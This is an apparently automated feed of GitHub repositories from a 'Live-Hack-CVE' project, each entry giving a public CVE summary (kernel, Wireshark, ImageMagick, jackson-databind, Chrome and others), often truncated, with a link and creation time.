**Ingenico Telium 2 POS terminals have an insecure NTPT3 protocol. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17774](https://github.com/Live-Hack-CVE/CVE-2018-17774) create time: 2022-12-28T17:07:50Z

**OpenJPEG before 2.3.1 has a heap buffer overflow in color_apply_icc_profile in bin/common/color.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-21010](https://github.com/Live-Hack-CVE/CVE-2018-21010) create time: 2022-12-28T17:06:43Z

**An issue was discovered in Xpdf 4.04. There is a crash in XRef::fetch(int, int, Object*, int) in xpdf/XRef.cc, a different vulnerability than CVE-2018-16369 and CVE-2019-16088. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41844](https://github.com/Live-Hack-CVE/CVE-2022-41844) create time: 2022-12-28T17:08:24Z

**An issue was discovered in BusyBox through 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP client, server, and/or relay) might allow a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to assurance of a 4-byte length when decoding DHC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5747](https://github.com/Live-Hack-CVE/CVE-2019-5747) create time: 2022-12-28T17:06:50Z

**mixin-deep is vulnerable to Prototype Pollution in versions before 1.3.2 and version 2.0.0. The function mixin-deep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10746](https://github.com/Live-Hack-CVE/CVE-2019-10746) create time: 2022-12-28T17:06:47Z

**A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16942](https://github.com/Live-Hack-CVE/CVE-2019-16942) create time: 2022-12-28T17:06:39Z

**In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0210](https://github.com/Live-Hack-CVE/CVE-2019-0210) create time: 2022-12-28T17:06:36Z

**A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16943](https://github.com/Live-Hack-CVE/CVE-2019-16943) create time: 2022-12-28T17:06:32Z

**A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17531](https://github.com/Live-Hack-CVE/CVE-2019-17531) create time: 2022-12-28T17:06:29Z

**Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle B CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2897](https://github.com/Live-Hack-CVE/CVE-2019-2897) create time: 2022-12-28T17:06:25Z

**FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20330](https://github.com/Live-Hack-CVE/CVE-2019-20330) create time: 2022-12-28T17:06:10Z

**Rock RMS before 1.8.6 mishandles vCard access control within the People/GetVCard/REST controller. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18641](https://github.com/Live-Hack-CVE/CVE-2019-18641) create time: 2022-12-28T17:06:03Z

**Froala Editor before 3.2.3 allows XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19935](https://github.com/Live-Hack-CVE/CVE-2019-19935) create time: 2022-12-28T17:05:29Z

**In GraphicsMagick 1.4 snapshot-20191208 Q8, there is a heap-based buffer over-read in the function EncodeImage of coders/pict.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19953](https://github.com/Live-Hack-CVE/CVE-2019-19953) create time: 2022-12-28T16:27:10Z

**In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WritePNGImage of coders/png.c, related to Magick_png_write_raw_profile and LocaleNCompare. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19949](https://github.com/Live-Hack-CVE/CVE-2019-19949) create time: 2022-12-28T16:27:01Z

**In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19948](https://github.com/Live-Hack-CVE/CVE-2019-19948) create time: 2022-12-28T16:26:57Z

**In GraphicsMagick 1.4 snapshot-20190423 Q8, there is a heap-based buffer overflow in the function ImportRLEPixels of coders/miff.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19951](https://github.com/Live-Hack-CVE/CVE-2019-19951) create time: 2022-12-28T16:26:51Z

**In GraphicsMagick 1.4 snapshot-20190403 Q8, there is a use-after-free in ThrowException and ThrowLoggedException of magick/error.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19950](https://github.com/Live-Hack-CVE/CVE-2019-19950) create time: 2022-12-28T16:26:48Z

**In the Linux kernel before 5.3.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/nfc/pn533/usb.c driver, aka CID-6af3aa57a098. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19526](https://github.com/Live-Hack-CVE/CVE-2019-19526) create time: 2022-12-28T16:26:44Z

**In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/class/cdc-acm.c driver, aka CID-c52873e5a1ef. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19530](https://github.com/Live-Hack-CVE/CVE-2019-19530) create time: 2022-12-28T16:26:40Z

**In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19527](https://github.com/Live-Hack-CVE/CVE-2019-19527) create time: 2022-12-28T16:26:36Z

**In the Linux kernel before 5.2.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/yurex.c driver, aka CID-fc05481b2fca. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19531](https://github.com/Live-Hack-CVE/CVE-2019-19531) create time: 2022-12-28T16:26:32Z

**In the Linux kernel before 5.3.12, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/input/ff-memless.c driver, aka CID-fa3a5a1880c9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19524](https://github.com/Live-Hack-CVE/CVE-2019-19524) create time: 2022-12-28T16:26:27Z

**In the Linux kernel before 5.3.6, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/net/ieee802154/atusb.c driver, aka CID-7fd25e6fc035. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19525](https://github.com/Live-Hack-CVE/CVE-2019-19525) create time: 2022-12-28T16:26:11Z

**In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/adutux.c driver, aka CID-44efc269db79. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19523](https://github.com/Live-Hack-CVE/CVE-2019-19523) create time: 2022-12-28T16:26:07Z

**A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, whe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1752](https://github.com/Live-Hack-CVE/CVE-2020-1752) create time: 2022-12-28T17:12:43Z

**The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a diff CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27618](https://github.com/Live-Hack-CVE/CVE-2020-27618) create time: 2022-12-28T17:12:40Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain a Key Management Error Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29505](https://github.com/Live-Hack-CVE/CVE-2020-29505) create time: 2022-12-28T17:08:06Z

**Insufficient validation of untrusted input in command line handling in Google Chrome on Windows prior to 85.0.4183.83 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6567](https://github.com/Live-Hack-CVE/CVE-2020-6567) create time: 2022-12-28T17:08:02Z

**Insufficient policy enforcement in intent handling in Google Chrome on Android prior to 85.0.4183.83 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6568](https://github.com/Live-Hack-CVE/CVE-2020-6568) create time: 2022-12-28T17:07:58Z

**Inappropriate implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6478](https://github.com/Live-Hack-CVE/CVE-2020-6478) create time: 2022-12-28T17:07:54Z

**Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6469](https://github.com/Live-Hack-CVE/CVE-2020-6469) create time: 2022-12-28T17:07:05Z

**Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely', resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2231](https://github.com/Live-Hack-CVE/CVE-2020-2231) create time: 2022-12-28T17:07:01Z

**macaron before 1.3.7 has an open redirect in the static handler, as demonstrated by the http://127.0.0.1:4000//example.com/ URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12666](https://github.com/Live-Hack-CVE/CVE-2020-12666) create time: 2022-12-28T17:06:58Z

**A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module. Sensitive parameters such as passwords and tokens are passed to kubectl from the command line, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1753](https://github.com/Live-Hack-CVE/CVE-2020-1753) create time: 2022-12-28T17:06:22Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2604](https://github.com/Live-Hack-CVE/CVE-2020-2604) create time: 2022-12-28T17:06:17Z

**An issue was discovered in the Linux kernel 3.16 through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9383](https://github.com/Live-Hack-CVE/CVE-2020-9383) create time: 2022-12-28T17:06:14Z

**In the Linux kernel 4.19 through 5.6.7 on the s390 platform, code execution may occur because of a race condition, as demonstrated by code in enable_sacf_uaccess in arch/s390/lib/uaccess.c that fails to protect against a concurrent page table upgrade, aka CID-3f777e19d171. A crash could also occur. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11884](https://github.com/Live-Hack-CVE/CVE-2020-11884) create time: 2022-12-28T17:06:07Z

**A vulnerability has been disclosed in thinx-device-api IoT Device Management Server before version 2.5.0. Device MAC address can be spoofed. This means initial registration requests without UDID and spoofed MAC address may pass to create new UDID with same MAC address. Full impact needs to be reviewed further. Applies CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11015](https://github.com/Live-Hack-CVE/CVE-2020-11015) create time: 2022-12-28T17:05:59Z

**gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the Linux kernel 3.16 through 5.6.13 relies on kstrdup without considering the possibility of an internal '\0' value, which allows attackers to trigger an out-of-bounds read, aka CID-15753588bcd4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13143](https://github.com/Live-Hack-CVE/CVE-2020-13143) create time: 2022-12-28T17:05:56Z

**Netflix Titus uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, different types of interpolation are supported, including Java EL expressions. If an attacker can inject arbitrary data in the error message template being passed to ConstraintValida CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9296](https://github.com/Live-Hack-CVE/CVE-2020-9296) create time: 2022-12-28T17:05:52Z

**A flaw was found in dpdk in versions before 18.11.10 and before 19.11.5. A flawed bounds checking in the copy_data function leads to a buffer overflow allowing an attacker in a virtual machine to write arbitrary data to any address in the vhost_crypto application. The highest threat from this vulnerability is to data c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14374](https://github.com/Live-Hack-CVE/CVE-2020-14374) create time: 2022-12-28T17:05:49Z

**In Dovecot before 2.3.11.3, uncontrolled recursion in submission, lmtp, and lda allows remote attackers to cause a denial of service (resource consumption) via a crafted e-mail message with deeply nested MIME parts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12100](https://github.com/Live-Hack-CVE/CVE-2020-12100) create time: 2022-12-28T17:05:45Z

**Firejail through 0.9.62 mishandles shell metacharacters during use of the --output or --output-stderr option, which may lead to command injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17368](https://github.com/Live-Hack-CVE/CVE-2020-17368) create time: 2022-12-28T17:05:42Z

**Solarwinds Orion (with Web Console WPM 2019.4.1, and Orion Platform HF4 or NPM HF2 2019.4) allows remote attackers to execute arbitrary code via a defined event. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14005](https://github.com/Live-Hack-CVE/CVE-2020-14005) create time: 2022-12-28T17:05:38Z

**A vulnerability in specified versions of American Dynamics victor Web Client and Software House CCURE Web Client could allow a remote unauthenticated attacker on the network to delete arbitrary files on the system or render the system unusable by conducting a Denial of Service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9048](https://github.com/Live-Hack-CVE/CVE-2020-9048) create time: 2022-12-28T17:05:25Z

**A vulnerability in the licensing service of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.The vulnerability is due to improper handling of system resource values by the affected system. An attacker could exploit this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3499](https://github.com/Live-Hack-CVE/CVE-2020-3499) create time: 2022-12-28T17:05:22Z

**A divide by zero issue was found to occur in libvncserver-0.9.12. A malicious client could use this flaw to send a specially crafted message that, when processed by the VNC server, would lead to a floating point exception, resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25708](https://github.com/Live-Hack-CVE/CVE-2020-25708) create time: 2022-12-28T17:05:18Z

**APT had several integer overflows and underflows while parsing .deb packages, aka GHSL-2020-168 GHSL-2020-169, in files apt-pkg/contrib/extracttar.cc, apt-pkg/deb/debfile.cc, and apt-pkg/contrib/arfile.cc. This issue affects: apt 1.2.32ubuntu0 versions prior to 1.2.32ubuntu0.2; 1.6.12ubuntu0 versions prior to 1.6.12ubu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27350](https://github.com/Live-Hack-CVE/CVE-2020-27350) create time: 2022-12-28T17:05:14Z

**Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.externalIPs field, to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8554](https://github.com/Live-Hack-CVE/CVE-2020-8554) create time: 2022-12-28T17:04:48Z

**A Memory Corruption vulnerability may lead to code execution through maliciously crafted DLL files. It was fixed in PDFTron earlier than 9.0.7 version in Autodesk Navisworks 2022, and 2020. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27527](https://github.com/Live-Hack-CVE/CVE-2022-27527) create time: 2022-12-28T17:04:14Z

**Missing Size Checks in Bluetooth HCI over SPI. Zephyr versions >= v1.14.2, >= v2.2.0 contain Improper Handling of Length Parameter Inconsistency (CWE-130). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hg2w-62p6-g67c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10065](https://github.com/Live-Hack-CVE/CVE-2020-10065) create time: 2022-12-28T17:03:22Z

**This affects the package thenify before 3.3.1. The name argument provided to the package can be controlled by users without any sanitization, and this is provided to the eval function without any sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7677](https://github.com/Live-Hack-CVE/CVE-2020-7677) create time: 2022-12-28T16:32:15Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29768](https://github.com/Live-Hack-CVE/CVE-2021-29768) create time: 2022-12-28T17:12:51Z

**NULL pointer exception in the IPPUSB dissector in Wireshark 3.4.0 to 3.4.9 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39920](https://github.com/Live-Hack-CVE/CVE-2021-39920) create time: 2022-12-28T17:12:25Z

**NULL pointer exception in the IEEE 802.11 dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39928](https://github.com/Live-Hack-CVE/CVE-2021-39928) create time: 2022-12-28T17:12:09Z

**Uncontrolled Recursion in the Bluetooth DHT dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39929](https://github.com/Live-Hack-CVE/CVE-2021-39929) create time: 2022-12-28T17:12:06Z

**Buffer overflow in the Bluetooth HCI_ISO dissector in Wireshark 3.4.0 to 3.4.9 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39926](https://github.com/Live-Hack-CVE/CVE-2021-39926) create time: 2022-12-28T17:12:02Z

**Buffer overflow in the Bluetooth SDP dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39925](https://github.com/Live-Hack-CVE/CVE-2021-39925) create time: 2022-12-28T17:11:58Z

**Large loop in the Bluetooth DHT dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39924](https://github.com/Live-Hack-CVE/CVE-2021-39924) create time: 2022-12-28T17:11:55Z

**Buffer overflow in the C12.22 dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39922](https://github.com/Live-Hack-CVE/CVE-2021-39922) create time: 2022-12-28T17:11:51Z

**NULL pointer exception in the Modbus dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39921](https://github.com/Live-Hack-CVE/CVE-2021-39921) create time: 2022-12-28T17:11:48Z

**tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv4() at tree.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45387](https://github.com/Live-Hack-CVE/CVE-2021-45387) create time: 2022-12-28T17:11:44Z

**An improper locking issue was found in the virStoragePoolLookupByTargetPath API of libvirt. It occurs in the storagePoolLookupByTargetPath function where a locked virStoragePoolObj object is not properly released on ACL permission failure. Clients connecting to the read-write socket with limited ACL permissions could u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3667](https://github.com/Live-Hack-CVE/CVE-2021-3667) create time: 2022-12-28T17:11:41Z

**A flaw was found in libvirt while it generates SELinux MCS category pairs for VMs' dynamic labels. This flaw allows one exploited guest to access files labeled for another guest, resulting in the breaking out of sVirt confinement. The highest threat from this vulnerability is to confidentiality and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3631](https://github.com/Live-Hack-CVE/CVE-2021-3631) create time: 2022-12-28T17:11:37Z

**The Deluge Web-UI is vulnerable to XSS through a crafted torrent file. The the data from torrent files is not properly sanitised as it's interpreted directly as HTML. Someone who supplies the user with a malicious torrent file can execute arbitrary Javascript code in the context of the user's browser session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3427](https://github.com/Live-Hack-CVE/CVE-2021-3427) create time: 2022-12-28T17:11:34Z

**Open Asset Import Library (aka assimp) 5.1.0 and 5.1.1 has a heap-based buffer overflow in _m3d_safestr (called from m3d_load and Assimp::M3DWrapper::M3DWrapper). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45948](https://github.com/Live-Hack-CVE/CVE-2021-45948) create time: 2022-12-28T17:11:10Z

**tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv6() at tree.c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45386](https://github.com/Live-Hack-CVE/CVE-2021-45386) create time: 2022-12-28T17:11:07Z

**IBM Cognos Analytics 11.2.1, 11.2.0, and 11.1.7 could allow a remote attacker to upload arbitrary files, caused by improper content validation. IBM X-Force ID: 211238. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38945](https://github.com/Live-Hack-CVE/CVE-2021-38945) create time: 2022-12-28T17:09:33Z

**IBM Planning Analytics 2.0 and IBM Cognos Analytics 11.2.1, 11.2.0, and 11.1.7 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-F CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39047](https://github.com/Live-Hack-CVE/CVE-2021-39047) create time: 2022-12-28T17:08:45Z

**Multiple vulnerabilities in Cisco Unified Communications Manager IM &amp; Presence Service (Unified CM IM&amp;P) could allow an attacker to conduct path traversal attacks and SQL injection attacks on an affected system. One of the SQL injection vulnerabilities that affects Unified CM IM&amp;P also affects Cisco Unified CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1357](https://github.com/Live-Hack-CVE/CVE-2021-1357) create time: 2022-12-28T17:04:52Z

**In PHP versions 7.3.x up to and including 7.3.31, 7.4.x below 7.4.25 and 8.0.x below 8.0.12, when running PHP FPM SAPI with main FPM daemon process running as root and child worker processes running as lower-privileged users, it is possible for the child processes to access memory shared with the main process and write CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21703](https://github.com/Live-Hack-CVE/CVE-2021-21703) create time: 2022-12-28T17:04:45Z

**Due to improper sanitization MedData HBYS software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with the web access is able to extract critical information from the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43362](https://github.com/Live-Hack-CVE/CVE-2021-43362) create time: 2022-12-28T17:04:41Z

**A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40167](https://github.com/Live-Hack-CVE/CVE-2021-40167) create time: 2022-12-28T17:04:32Z

**OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23839](https://github.com/Live-Hack-CVE/CVE-2021-23839) create time: 2022-12-28T17:03:33Z

**Multiple vulnerabilities in Cisco Jabber for Windows, Cisco Jabber for MacOS, and Cisco Jabber for mobile platforms could allow an attacker to execute arbitrary programs on the underlying operating system with elevated privileges, access sensitive information, intercept protected network traffic, or cause a denial of s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1417](https://github.com/Live-Hack-CVE/CVE-2021-1417) create time: 2022-12-28T17:03:30Z

**In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20990](https://github.com/Live-Hack-CVE/CVE-2021-20990) create time: 2022-12-28T17:03:26Z

**In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25217](https://github.com/Live-Hack-CVE/CVE-2021-25217) create time: 2022-12-28T17:03:19Z

**The cli_feat_read_cb() function in src/gatt-database.c does not perform bounds checks on the 'offset' variable before using it as an index into an array for reading. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3588](https://github.com/Live-Hack-CVE/CVE-2021-3588) create time: 2022-12-28T17:03:15Z

**Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the underlying string library can be used to corrupt the heap and potentially result with denial of service or remote code execution. The vulnerability involves changing the default proto-max-bulk-len configuration parameter t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41099](https://github.com/Live-Hack-CVE/CVE-2021-41099) create time: 2022-12-28T17:03:12Z

**PCI devices with RMRRs not deassigned correctly Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR"). These are typically used for platform tasks such as legacy USB emulation. If such a device is passed through to a guest, then on guest shutd CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28702](https://github.com/Live-Hack-CVE/CVE-2021-28702) create time: 2022-12-28T17:02:56Z

**Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20989](https://github.com/Live-Hack-CVE/CVE-2021-20989) create time: 2022-12-28T17:02:49Z

**Improper access control in BlueZ may allow an authenticated user to potentially enable information disclosure via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0129](https://github.com/Live-Hack-CVE/CVE-2021-0129) create time: 2022-12-28T17:02:45Z

**A remote file download issue can occur in some capabilities of Esri ArcGIS Server web services that may in some edge cases allow a remote, unauthenticated attacker to induce an unsuspecting victim to launch a process in the victim's PATH environment. Current browsers provide users with warnings against running unsigned CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38199](https://github.com/Live-Hack-CVE/CVE-2022-38199) create time: 2022-12-28T17:14:00Z

**SputnikVM, also called evm, is a Rust implementation of Ethereum Virtual Machine. A custom stateful precompile can use the `is_static` parameter to determine if the call is executed in a static context (via `STATICCALL`), and thus decide if stateful operations should be done. Prior to version 0.36.0, the passed `is_sta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39354](https://github.com/Live-Hack-CVE/CVE-2022-39354) create time: 2022-12-28T17:13:56Z

**Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it does not contain the Snow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39357](https://github.com/Live-Hack-CVE/CVE-2022-39357) create time: 2022-12-28T17:13:53Z

**Discourse Patreon enables syncronization between Discourse Groups and Patreon rewards. On sites with Patreon login enabled, an improper authentication vulnerability could be used to take control of a victim's forum account. This vulnerability is patched in commit number 846d012151514b35ce42a1636c7d70f6dcee879e of the d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39355](https://github.com/Live-Hack-CVE/CVE-2022-39355) create time: 2022-12-28T17:13:49Z

